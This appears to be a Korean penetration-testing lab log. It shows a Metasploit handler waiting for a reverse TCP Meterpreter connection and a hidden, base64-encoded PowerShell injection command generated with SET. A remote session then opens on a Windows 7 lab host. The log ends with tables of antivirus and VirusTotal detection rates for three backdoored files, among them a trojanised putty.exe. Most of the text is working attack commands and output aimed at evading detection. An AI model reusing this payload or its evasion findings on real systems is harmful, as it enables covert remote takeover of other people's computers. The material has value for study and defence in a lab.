
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0

LHOST => 0.0.0.0

resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false

ExitOnSession => false

resource (/root/.set/reports/powershell/powershell.rc)> exploit -j

[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:443

msf exploit(handler) > [*] Starting the payload handler...

<ENTER>

msf exploit(handler) > jobs

Jobs

====

  Id  Name                    Payload                          LPORT

  --  ----                    -------                          -----

  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  443

msf exploit(handler) >

powershell.rc  x86_powershell_injection.txt

powershell.rc:                ASCII text

x86_powershell_injection.txt: ASCII text, with very long lines, with no line terminators

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LPORT 443

set LHOST 0.0.0.0

set ExitOnSession false

powershell -nop -win hidden -noni -enc JABVAHAATgAgAD0AIAAnACQAbQBuAEQAQQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQA

..... (중략) .....

BlAHQAQgB5AHQAZQBzACgAJABVAHAATgApACkAOwAkAHAAaABDACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAdgBpADMAYgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAB2AGkAMwBiACAAJABwAGgAQwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABwAGgAQwAgACQAZQAiADsAfQA=

msf exploit(handler) >

[*] Sending stage (957487 bytes) to 192.168.20.202

[*] Meterpreter session 1 opened (192.168.20.50:443 -> 192.168.20.202:49182) at 2016-06-30 11:27:29 +0900

<ENTER>

msf exploit(handler) > sessions -l

Active sessions

===============

  Id  Type                   Information                      Connection

  --  ----                   -----------                      ----------

  1   meterpreter x86/win32  soldesk-PC\soldesk @ SOLDESK-PC  192.168.20.50:443 -> 192.168.20.202:49182 (192.168.20.202)

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > sysinfo

Computer        : SOLDESK-PC

OS              : Windows 7 (Build 7601, Service Pack 1).

Architecture    : x64 (Current Process is WOW64)

System Language : ko_KR

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x86/win32

meterpreter >

실행전

실행후

파일이름

만든방법

V3 Lite

탐지유무

VirusTotal 결과

reverse_test.exe

msfvenom CMD

파일 전송시

X

53개중 12개 AV가 탐지

파일 실행시

X

디렉토리 검사시

X

putty.exe

backdoor-factory CMD

파일 전송시

X

53개중 19개 AV가 탐지

파일 실행시

X

디렉토리 검사시

X

x86_powershell_injection.bat

setookit CMD

파일 전송시

X

53개중 3개 AV가 탐지

파일 실행시

X

디렉토리 검사시

X

파일이름

만든방법

VirusTotal 사이트에서 탐지한 AV 종류

reverse_test.exe

msfvenom CMD

AVG

AVware

Antiy-AVL

Avast

ESET-NOD32

Fortinet

GData

lkarus

Jiangmin

Malwarebytes

TrendMicro-HouseCall

putty.exe

backdoor-factory CMD

ALYac

AVG

AVware

Arcabit

Avast

BitDefender

Cyren

ESET-NOD32

Emsisoft

F-Port

F-Secure

GData

lkarus

K7AntiVirus

K7GW

eScan

Qihoo-360

TrendMicro-HouseCall

Zillya

x86_powershell_injection.bat

setookit CMD

Avast

lkarus

McAfee